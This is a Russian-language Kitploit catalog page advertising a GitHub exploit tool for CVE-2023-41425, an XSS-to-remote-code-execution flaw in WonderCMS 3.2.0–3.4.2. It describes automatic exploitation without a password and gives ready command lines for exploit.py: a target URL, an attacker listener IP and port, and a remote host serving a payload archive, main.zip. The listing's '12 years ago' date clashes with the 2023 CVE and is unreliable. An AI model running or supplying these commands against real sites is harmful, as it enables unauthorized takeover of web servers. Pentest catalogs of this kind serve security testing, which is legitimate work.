Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-41425 — WonderCMS RCE CVE-2023-41425 | Kitploit
Инструменты/GitHubGitHub/twappz/cve-2023-41425
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на Проникновение
GitHubtwappz/cve-2023-41425

CVE-2023-41425

WonderCMS RCE CVE-2023-41425

Репозиторий
12 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

RCE для WonderCMS версий v3.2.0 – v3.4.2

Версии WonderCMS с v3.2.0 по v3.4.2 с XSS-уязвимостью позволяют злоумышленнику выполнить RCE, загрузив компонент в installModule CVE-2023-41425 (знание пароля не требуется).

Особенности:

  • Автоматическая эксплуатация CVE-2023-41425
  • Простота указания удалённого хоста, с которого загружается zip-архив

Использование/Примеры

Указание удалённого хоста, с которого загружается файл main.zip

root@kitploit:~
./exploit.py -u http://example.com/loginURL -i 10.10.14.110 -p 4321 -r http://10.10.14.110:8000/main.zip

ИЛИ не указывая файл main.zip. По умолчанию он загружается из main.zip

root@kitploit:~
./exploit.py -u http://example.com/loginURL -i 10.10.14.110 -p 4321

Скриншоты

Useage Useage

🔗 Ссылки

Скачать инструмент
my website
youtube
twitter
instagram
Hack the box